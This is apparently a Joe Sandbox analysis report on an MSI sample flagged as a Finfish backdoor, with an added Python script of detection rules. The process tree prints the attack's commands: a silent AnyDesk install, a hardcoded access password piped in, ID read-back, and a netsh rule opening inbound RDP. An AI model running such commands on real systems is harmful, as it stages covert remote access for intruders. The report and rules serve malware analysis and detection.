Windows
Analysis Report
1.msi
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- msiexec.exe (PID: 2996 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1.msi" MD5: AC2E7152124CEED36846BD1B6592A00F)
- msiexec.exe (PID: 1184 cmdline: C:\Windows\system32\msiexec.exe /V MD5: AC2E7152124CEED36846BD1B6592A00F)
  - msiexec.exe (PID: 2876 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6381DE7DB6BAADD41D0E24C26E59EDFC MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  - cmd.exe (PID: 2332 cmdline: C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files" MD5: AD7B9C14083B52BC532FBA5948342B98)
  - msiexec.exe (PID: 1704 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 22388C515E15FC158EA4B11229C0F8D9 E Global\MSI0000 MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  - icacls.exe (PID: 1820 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
  - expand.exe (PID: 672 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 659CED6D7BDA047BCC6048384231DB9F)
  - install.exe (PID: 2440 cmdline: "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe" MD5: 8C42AB81F90EE0592F7A709F0F7E320B)
  - cmd.exe (PID: 1404 cmdline: cmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent MD5: AD7B9C14083B52BC532FBA5948342B98)
  - anydesk.exe (PID: 2640 cmdline: c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent MD5: 1BC5890C9E7BF54B7712E344B0AF9D04)
  - cmd.exe (PID: 2544 cmdline: cmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password MD5: AD7B9C14083B52BC532FBA5948342B98)
  - cmd.exe (PID: 2548 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo 31121985west" MD5: AD7B9C14083B52BC532FBA5948342B98)
  - AnyDesk.exe (PID: 2856 cmdline: c:\programdata\anydesk\anydesk.exe --set-password MD5: 1BC5890C9E7BF54B7712E344B0AF9D04)
  - AnyDesk.exe (PID: 2120 cmdline: "c:\programdata\anydesk\anydesk.exe" --get-id MD5: 1BC5890C9E7BF54B7712E344B0AF9D04)
  - netsh.exe (PID: 2744 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow MD5: 784A50A6A09C25F011C3143DDD68E729)
  - icacls.exe (PID: 1004 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
- VSSVC.exe (PID: 1232 cmdline: C:\Windows\system32\vssvc.exe MD5: B60BA0BC31B0CB414593E169F6F21CC2)
- svchost.exe (PID: 2224 cmdline: C:\Windows\System32\svchost.exe -k swprv MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
- rdpdr.sys (PID: 4, kernel driver loaded into System, MD5: 1B6163C503398B23FF8B939C67747683)
- tdtcp.sys (PID: 4, kernel driver loaded into System, MD5: 51C5ECEB1CDEE2468A1748BE550CFBC8)
- tssecsrv.sys (PID: 4, kernel driver loaded into System, MD5: 19BEDA57F3E0A06B8D5EB6D619BD5624)
- rdpwd.sys (PID: 4, kernel driver loaded into System, MD5: FE571E088C2D83619D2D48D4E961BF41)
- AnyDesk.exe (PID: 2556 cmdline: "C:\ProgramData\AnyDesk\AnyDesk.exe" --service MD5: 1BC5890C9E7BF54B7712E344B0AF9D04)
- AnyDesk.exe (PID: 2336 cmdline: "C:\ProgramData\AnyDesk\AnyDesk.exe" --control MD5: 1BC5890C9E7BF54B7712E344B0AF9D04)
- cleanup
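The process tree above is the whole story of this sample: the MSI unpacks files.cab into a temporary MW-<GUID> directory and runs install.exe from it, install.exe installs AnyDesk silently into C:\ProgramData\AnyDesk, the unattended-access password is fed to anydesk.exe --set-password through an echo pipe (so the password, 31121985west, is visible in plain text in the cmd.exe command line of PID 2544), the AnyDesk ID is read back with --get-id, and netsh adds an inbound firewall allow rule for TCP/3389. The following is an added detection example and is not part of the Joe Sandbox report: it runs a handful of command-line rules over the command lines from the tree, rebuilt here as the CommandLine field of a Sysmon Event ID 1 or Security 4688 record would carry them (the PIDs are the report's, the MD5s are dropped), and then scores the chain as a whole. The rule names, the Finding type and the verdict keys are the example's own.

```python
"""Command-line detection rules for the AnyDesk deployment chain in this report.

Added example; not part of the Joe Sandbox report. PROCESS_EVENTS is rebuilt
from the report's process tree as (PID, command line) pairs; the rule names
and the Finding type are this example's own.
"""
import re
from dataclasses import dataclass

# (PID, CommandLine) pairs taken from the report's process tree. The MD5s are
# left out; the PID only serves to tie a finding back to the tree.
PROCESS_EVENTS = [
    (2996, r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1.msi"'),
    (2332, r'C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files"'),
    (1820, r'"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH'),
    (672,  r'"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files'),
    (2440, r'"C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe"'),
    (1404, r'cmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent'),
    (2640, r'c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent'),
    (2544, r'cmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password'),
    (2548, r'C:\Windows\system32\cmd.exe /S /D /c" echo 31121985west"'),
    (2856, r'c:\programdata\anydesk\anydesk.exe --set-password'),
    (2120, r'"c:\programdata\anydesk\anydesk.exe" --get-id'),
    (2744, r'netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow'),
]


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def _netsh_rule_args(cmd: str) -> dict:
    """Parse the key=value arguments of 'netsh advfirewall firewall add rule'."""
    pairs = re.findall(r'(\w+)=("[^"]*"|\S+)', cmd)
    return {k.lower(): v.strip('"').lower() for k, v in pairs}


def scan_process_events(events):
    """Apply the rules to (pid, command line) pairs and return all findings."""
    findings = []
    for pid, cmd in events:
        low = cmd.lower()

        # Rule 1: AnyDesk installed without any user interaction.
        if re.search(r'anydesk\.exe"?\s+--install\b', low) and "--silent" in low:
            findings.append(Finding(pid, "anydesk_silent_install",
                                    "AnyDesk installed silently"))

        # Rule 2: the installer runs from the ProgramData root, a location any
        # user can write to, rather than from Program Files.
        if "\\programdata\\anydesk.exe" in low:
            findings.append(Finding(pid, "anydesk_binary_in_programdata",
                                    "remote-access binary executed from C:\\ProgramData"))

        # Rule 3: unattended-access password set from a script. When it is piped
        # in with echo, the password is recoverable from the command line itself.
        piped = re.search(r'echo\s+([^|\s]+)\s*\|\s*\S*anydesk\.exe"?\s+--set-password', cmd, re.I)
        if piped:
            findings.append(Finding(pid, "anydesk_password_piped",
                                    f"unattended-access password on stdin: {piped.group(1)}"))
        elif re.search(r'anydesk\.exe"?\s+--set-password', low):
            findings.append(Finding(pid, "anydesk_set_password",
                                    "unattended-access password set non-interactively"))

        # Rule 4: the AnyDesk ID is read back, i.e. someone intends to connect.
        if re.search(r'anydesk\.exe"?\s+--get-id', low):
            findings.append(Finding(pid, "anydesk_get_id", "AnyDesk ID harvested"))

        # Rule 5: an inbound allow rule for TCP/3389 added through netsh.
        if re.match(r'^\s*(?:"?[^"]*\\)?netsh(?:\.exe)?"?\s+advfirewall\s+firewall\s+add\s+rule\b', low):
            args = _netsh_rule_args(cmd)
            if (args.get("action") == "allow" and args.get("dir") == "in"
                    and args.get("localport") == "3389"):
                findings.append(Finding(pid, "rdp_inbound_allow_rule",
                                        f"inbound TCP/3389 allowed by rule {args.get('name')!r}"))
    return findings


def assess_chain(findings):
    """Combine single findings into a verdict: silent install, password set and
    ID read-back together mean unattended remote access is being staged."""
    rules = {f.rule for f in findings}
    password_set = bool(rules & {"anydesk_password_piped", "anydesk_set_password"})
    staged = {"anydesk_silent_install", "anydesk_get_id"} <= rules and password_set
    counts = {r: sum(1 for f in findings if f.rule == r) for r in sorted(rules)}
    return {"unattended_remote_access_staged": staged,
            "rdp_exposed": "rdp_inbound_allow_rule" in rules,
            "rule_counts": counts}


if __name__ == "__main__":
    found = scan_process_events(PROCESS_EVENTS)
    for f in found:
        print(f"PID {f.pid:>5}  {f.rule:<30} {f.detail}")
    print(assess_chain(found))
```

The single rules fire on legitimate administration too: `--install ... --silent` is AnyDesk's documented deployment syntax and help desks do open 3389. What separates this sample from a managed roll-out is the combination that assess_chain scores (silent install plus a scripted password plus an ID read-back within the same chain), and the password itself, which an incident responder will want because it is what the operator uses to connect.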
AV Detection
(signature source and value cells were not captured; signature type and number of entries only)
- Virustotal, ReversingLabs, Metadefender, Avira: 21 scanner entries (per-file percentages and labels are in the detection tables below)
- File created: 2 entries
- Binary string: 9 entries
- File opened: 25 entries
- IP Address: 1 entry
- TCP traffic: 2 entries
- Network traffic detected: 2 entries
- TCP traffic detected without corresponding DNS query: 6 entries
- String found in binary or memory: 2 entries
- String found in binary or memory: 38 entries
- DNS traffic detected: 1 entry
- Code function: 11_2_004013DD
- Binary or memory string: 1 entry
- File deleted: 1 entry
- File created: 1 entry
- Code function: 16_2_01042DFD, 20_2_012A2DFD
- Static PE information: 1 entry
- Process Stats: 1 entry
- Static PE information: 2 entries
- Static PE information: 4 entries
- Driver loaded: 1 entry
- Dropped File: 1 entry
- Memory allocated: 18 entries
- Virustotal, ReversingLabs: 2 entries
- Key opened: 1 entry
- Console Write: 4 entries
- Process created: 34 entries
- Key value queried: 1 entry
- Code function: 11_2_00401C0B
- File created: 1 entry
- File created: 1 entry
- Classification label: 1 entry
- File read: 1 entry
- Mutant created: 11 entries
- Code function: 11_2_00401254
- File written: 1 entry
- File read: 1 entry
- Window detected: 1 entry
- Static file information: 1 entry
- Binary string: 9 entries
Data Obfuscation
(signature source and value cells were not captured; signature type and number of entries only)
- Unpacked PE file: 5 entries
- Code function: 16_2_015A9818, 20_2_01809818, 20_2_01809818
- Code function: 20_2_01817257
- File created (dropped file): 2 entries
- File created (dropped file): 8 entries
- File created (dropped file): 4 entries
- File created: 2 entries
Boot Survival
(signature source and value cells were not captured; signature type and number of entries only)
- Key value created or modified: 1 entry
- Key value created or modified: 4 entries
- Registry key value modified: 1 entry
- Registry key created: 1 entry
Hooking and other Techniques for Hiding and Protection
(signature source and value cells were not captured; signature type and number of entries only)
- Registry value created: 1 entry
- File opened: 1 entry
- Process created: 1 entry
- Process information set: 69 entries
- Thread sleep time / Thread sleep count: 24 entries
- Thread sleep count: 1 entry
- Thread delayed: 8 entries
- Window / User API: 2 entries
- File opened / queried: 1 entry
- Process information queried: 1 entry
- Thread delayed: 8 entries
- File Volume queried: 17 entries
- Binary or memory string: 6 entries
- Code function: 16_2_015B0229
- Code function: 20_2_01817257
- Memory protected: 1 entry
- Code function: 16_2_015B0229, 20_2_01810229, 20_2_01810229, 20_2_0180743D, 20_2_0180743D
- File opened: 1 entry
- Process created: 14 entries
- Queries volume information: 4 entries
- Key value queried: 1 entry
- Code function: 20_2_016F9BE0
Lowering of HIPS / PFW / Operating System Security Settings
(signature source and value cells were not captured; signature type and number of entries only)
- Process created: 1 entry
- Process created: 1 entry
- Binary or memory string: 1 entry
- Binary or memory string: 3 entries
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Replication Through Removable Media | 1 Native API | 1 LSASS Driver | 1 LSASS Driver | 211 Disable or Modify Tools | 1 Input Capture | 1 System Time Discovery | 1 Replication Through Removable Media | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 1 Command and Scripting Interpreter | 1 Image File Execution Options Injection | 1 Image File Execution Options Injection | 1 Obfuscated Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 12 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | 2 Windows Service | 1 Access Token Manipulation | 11 Software Packing | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | 1 Registry Run Keys / Startup Folder | 2 Windows Service | 1 File Deletion | NTDS | 14 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 1 Non-Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | 1 Services File Permissions Weakness | 11 Process Injection | 21 Masquerading | LSA Secrets | 131 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | 2 Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | 1 Registry Run Keys / Startup Folder | 41 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | 1 Services File Permissions Weakness | 1 Access Token Manipulation | DCSync | 41 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Hidden Users | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | 1 Services File Permissions Weakness | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
48% | Virustotal | Browse | ||
30% | ReversingLabs | Win32.Backdoor.Finfish | ||
100% | Avira | BDS/Finfish.ujrxw |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira | BDS/Finfish.ujrxw | ||
100% | Avira | BDS/Finfish.ujrxw | ||
100% | Avira | TR/Dropper.Gen | ||
100% | Joe Sandbox ML | |||
0% | Virustotal | Browse | ||
3% | Metadefender | Browse | ||
2% | ReversingLabs | |||
64% | Virustotal | Browse | ||
22% | Metadefender | Browse | ||
65% | ReversingLabs | Win32.Backdoor.Finfish | ||
64% | Virustotal | Browse | ||
22% | Metadefender | Browse | ||
65% | ReversingLabs | Win32.Backdoor.Finfish | ||
0% | Virustotal | Browse | ||
0% | Metadefender | Browse | ||
0% | ReversingLabs | |||
0% | Virustotal | Browse | ||
0% | Metadefender | Browse | ||
0% | ReversingLabs | |||
0% | Metadefender | Browse | ||
0% | ReversingLabs | |||
0% | Metadefender | Browse | ||
0% | ReversingLabs |
Source | Detection | Scanner | Label |
---|---|---|---|
(9 dropped files; names not captured) | 100% | Avira | TR/Dropper.Gen |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
boot.net.anydesk.com | 92.223.88.41 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
(38 URLs; names and sources not captured) | | false | | high (37 entries), unknown (1 entry) |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
92.223.88.41 | boot.net.anydesk.com | Austria | 199524 | GCOREAT | false | |
195.181.174.174 | unknown | United Kingdom | 60068 | CDN77GB | false | |
80.209.241.3 | unknown | United States | 395839 | HOSTKEY-USAUS | false | |
195.181.174.167 | unknown | United Kingdom | 60068 | CDN77GB | false |
IP |
---|
192.168.2.3 |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 679413 |
Start date and time: | 2022-08-05 18:21:10 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 11m 50s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | 1.msi |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 30 |
Number of new started drivers analysed: | 4 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | (not captured) |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.evad.winMSI@34/28@4/5 |
EGA Information: | (not captured) |
HDC Information: | (not captured) |
HCA Information: | Failed |
Cookbook Comments: | (not captured) |
- Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
- Not all processes were analyzed, report is missing behavior information
- Report creation exceeded maximum time and may have missing disassembly code information.
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtFsControlFile calls found.
- Report size getting too big, too many NtOpenFile calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Time | Type | Description |
---|---|---|
18:22:14 | API Interceptor | |
18:22:16 | API Interceptor | |
18:22:16 | API Interceptor | |
18:23:06 | API Interceptor | |
18:23:15 | API Interceptor | |
18:23:23 | API Interceptor | |
18:23:28 | API Interceptor | |
18:23:59 | API Interceptor | |
Match | Associated samples (name / SHA 256 not captured) | Detection |
---|---|---|
92.223.88.41 | 7 | malicious |
195.181.174.174 | 4 | malicious |
195.181.174.167 | 4 | malicious |
Match | Associated samples (name / SHA 256 not captured) | Detection |
---|---|---|
boot.net.anydesk.com | 9 | malicious |
Match | Associated samples (name / SHA 256 not captured) | Detection |
---|---|---|
CDN77GB | 20 | malicious |
GCOREAT | 20 | malicious |
Match | Associated samples (name / SHA 256 not captured) | Detection |
---|---|---|
C:\ProgramData\anydesk\AnyDesk.exe | 1 | malicious |
C:\Windows\Installer\MSI5BE8.tmp | 20 | malicious |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7322 |
Entropy (8bit): | 5.5670592053751085 |
Encrypted: | false |
SSDEEP: | 96:89EuAeuAD8tekIQBUwVPVfbCsAqGxUwVPVfbC6j2PBOuA5AqGSHLuAlv5qZW9MNz:8euZuLev6tfm86tfmuuUumk+uNdEpW |
MD5: | B7025B12AA3BE2CAE5DEF3833655E219 |
SHA1: | 102FA7B4C4260D9D5BD7C30281BD08001BEEB23C |
SHA-256: | 7B29024A6914C3B956525901EF818DABF62C9C89B6368612547024862E7BF148 |
SHA-512: | 5C72611C364608962962D2ECF12D7A1B4673BD25D7A8427A2E8898ACE59B1E34D613098E807F772833DB86F5A1786EF0D86F96AE7C1F4E226A1844AFB312B0B7 |
Malicious: | false |
Preview: |
Process: | C:\ProgramData\anydesk.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3829888 |
Entropy (8bit): | 7.999053982852042 |
Encrypted: | true |
SSDEEP: | 98304:nDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3H:n7svcsImkN4chYECl3 |
MD5: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
SHA1: | 78C9302C7A387A8D158F38D501784BE9B8B2716D |
SHA-256: | AF61905129F377F5934B3BBF787E8D2417901858BB028F40F02200E985EE62F6 |
SHA-512: | 7113888A8439AE5AF1B260C40229F7EBB98BDECE52EBAB0CE97137933AF4E9777D92D68166DBCF87A95CF88615452CAE7ECDF555B4785FFFE63C5783DBCB595D |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Preview: |
Process: | C:\ProgramData\anydesk\AnyDesk.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2898 |
Entropy (8bit): | 6.03920180688192 |
Encrypted: | false |
SSDEEP: | 48:uISTiIhiUqIhAIH/ARw+Pi+2ZeFL8GjZnHA5OFh31vtd9CgtiFjRcFmKBI45:uIST/iUx1/AJPi2FNpAwFjP9TtccFFd5 |
MD5: | D78C36C1B2DF59D1D7A19E89218822A8 |
SHA1: | 9D14F9FE8AF7BDF5EB25F7BEA366E4C7C6DB8389 |
SHA-256: | 1932C23AE6AB035EF6AB0E224EF58638AF13DFD12C53A2BC13E7A281CFE51717 |
SHA-512: | 974080C66AA8AD073450A3A44F97FA48FAB8F872BEEBE0CC25801E2D66ADF6BF184B9C6D1D80A9C3941EC991496D327393228A0A902D65AD0D4B7B55EA3F3801 |
Malicious: | false |
Preview: |
Process: | C:\ProgramData\anydesk.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 664 |
Entropy (8bit): | 4.694299449856687 |
Encrypted: | false |
SSDEEP: | 12:oUrQM3uqQHvWhOLroBGgFBGgItgw/T5hgnx7b0wlcpv:dF37AwetBVBTPC7bJlSv |
MD5: | 49B7C6D323D2E373B0CEAEB28B4BBDC5 |
SHA1: | 0E5D4E26427190E07495FCC5FBFE46A20C07FCAA |
SHA-256: | 4E120EA4CAECD70BF796C634FA2278FAF0BA5424406D1AA367957210B666644A |
SHA-512: | BC5EF736EC71E6940422240523978D6B918B5747AE30437188757458DDA415B02FB9CD61B208C59C5B89991D0557E4BEE4FE6ABB61BBBC3D63C0A5C733326571 |
Malicious: | false |
Preview: |
C:\System Volume Information\SPP\OnlineMetadataCache\{13f380d2-c95e-45d3-8b58-ce3c6d9cc4c1}_OnDiskSnapshotProp
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3048 |
Entropy (8bit): | 3.694456222285318 |
Encrypted: | false |
SSDEEP: | 48:2QzaN38RN3x0/7wP8aZntCwL7feGp9bHfOIgbR1fOIgBKEBKRC6v6ReyZ:2QzI4uU/vfHzbOHXOHB9BpiW |
MD5: | 5F246453E47299A07D8C949665C8A0FE |
SHA1: | 5B341BA26C94F782A34C5523FAC302B7BCD3411A |
SHA-256: | 2EA3134921D1CD1F5E95079CE163D36DE1351A6361410967016DC69F0291F419 |
SHA-512: | DE72396CF4181BAC60E006E18A83519A9B3DF6E56FFACAAEDF9308CD8C4717B9E520DCACEE735803663DB6F661C5E5E04647B1443B73CFA474307AFC75C0CA28 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8734472 |
Entropy (8bit): | 3.681659655459525 |
Encrypted: | false |
SSDEEP: | 12288:+8+YgDYEzT4G09wYKc9rMjG/BWigr7dCKV0/HwLQt+Y/g4zsuAvm7gPI+PhgcIrd:d0jYY8BWitXZh7TeQsPIy1YQza |
MD5: | 9CC465911CDBD0BFC8D7BFC74ECCE88B |
SHA1: | 867E1C21ADBC08A0BC12B1ED50F59EB3A78EC23F |
SHA-256: | BA671D105C6C5A76B5B2D369E12887BCF3C729CFCF34F222A6DB2D4FF3AA666E |
SHA-512: | 04D495AC9EBEDC50F9FF325912A19A31B00A54EB0FA99830FBB6B1CBFB1847A21447BE699FE42AD45F80842E1D672F44FAEA0C38519CFEFAB4C86547106CDCF0 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3048 |
Entropy (8bit): | 3.694456222285318 |
Encrypted: | false |
SSDEEP: | 48:2QzaN38RN3x0/7wP8aZntCwL7feGp9bHfOIgbR1fOIgBKEBKRC6v6ReyZ:2QzI4uU/vfHzbOHXOHB9BpiW |
MD5: | 5F246453E47299A07D8C949665C8A0FE |
SHA1: | 5B341BA26C94F782A34C5523FAC302B7BCD3411A |
SHA-256: | 2EA3134921D1CD1F5E95079CE163D36DE1351A6361410967016DC69F0291F419 |
SHA-512: | DE72396CF4181BAC60E006E18A83519A9B3DF6E56FFACAAEDF9308CD8C4717B9E520DCACEE735803663DB6F661C5E5E04647B1443B73CFA474307AFC75C0CA28 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3811024 |
Entropy (8bit): | 7.999935868582085 |
Encrypted: | true |
SSDEEP: | 98304:bvXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHwO:bzkTciIYUNuNCAuPHD |
MD5: | 223FA9756FCE44168ABD5DB7AFA03FAD |
SHA1: | 2E8BFC88819353490EC4C201445DC004FA9AAFF5 |
SHA-256: | A929C064C064A1B5013B8FBCE01FEB7AE08E6BD9B05106DCDA8320F9DB0FB13D |
SHA-512: | 0EFE5917995E6EE837AADBB9951AD1F7BCADFA9638DE747B219E6A9BBE53FD586118A291776C6FF1C0416B3B439DADB0336AE61E74B1E6D12E9A38F11DAC33EC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\$dpx$.tmp\eee52229ee24a34cb61191d27a7b66f1.tmp
Process: | C:\Windows\SysWOW64\expand.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3837440 |
Entropy (8bit): | 7.998303388385036 |
Encrypted: | true |
SSDEEP: | 98304:dDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3:d7svcsImkN4chYECl |
MD5: | 8C42AB81F90EE0592F7A709F0F7E320B |
SHA1: | 6656C6CA4611245CDA44958BAB84866196C9D95B |
SHA-256: | BEB6182CEAB6EA0B0FDC0F41F8069632317E0F941419B75EDE4145593CD6A21C |
SHA-512: | 57A444D1B03DCD428EB386E5551137DF5B7D401AC39F5B3481DAD6A94C7A95C3DD90B638532EFDD813C293CF4F949ED4461424FA940410F2D59E2DFDD88CA5EA |
Malicious: | true |
Antivirus: | |
Preview: |
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe (copy)
Process: | C:\Windows\SysWOW64\expand.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3837440 |
Entropy (8bit): | 7.998303388385036 |
Encrypted: | true |
SSDEEP: | 98304:dDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3:d7svcsImkN4chYECl |
MD5: | 8C42AB81F90EE0592F7A709F0F7E320B |
SHA1: | 6656C6CA4611245CDA44958BAB84866196C9D95B |
SHA-256: | BEB6182CEAB6EA0B0FDC0F41F8069632317E0F941419B75EDE4145593CD6A21C |
SHA-512: | 57A444D1B03DCD428EB386E5551137DF5B7D401AC39F5B3481DAD6A94C7A95C3DD90B638532EFDD813C293CF4F949ED4461424FA940410F2D59E2DFDD88CA5EA |
Malicious: | true |
Antivirus: | |
Preview: |
C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\msiwrapper.ini
Process: | C:\Windows\SysWOW64\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1426 |
Entropy (8bit): | 3.650455137438292 |
Encrypted: | false |
SSDEEP: | 24:udX8DW8XjsjToZkESrFEqNbH+qNbH4yDqNbHgO+sD+n:uYg1JFxNvNE7Nxyn |
MD5: | F03B2CD5999D483E566FED5D7E1BD078 |
SHA1: | EBC636C000806FBCD93952B3B4BFB97BF281E2F9 |
SHA-256: | 36CCB8B1213585E1CD56DEF34AC141DD8653AA0050A0C4105FA4C285AC3CC084 |
SHA-512: | 83690F70DCD916684C0CBE302A35C96909D31D6C6D06F0BE6950D59ACE0B834EC69021B851E9C30A0B594A5DA7044EBA3F0CADD0417FA588DCE148AFB921E1C6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 32768 |
Entropy (8bit): | 0.06743406194521226 |
Encrypted: | false |
SSDEEP: | 6:2/9LG7iVCnLG7iVrKOzPLHKOv+eHmNfftCVky6lh1:2F0i8n0itFzDHFv+eGBTj |
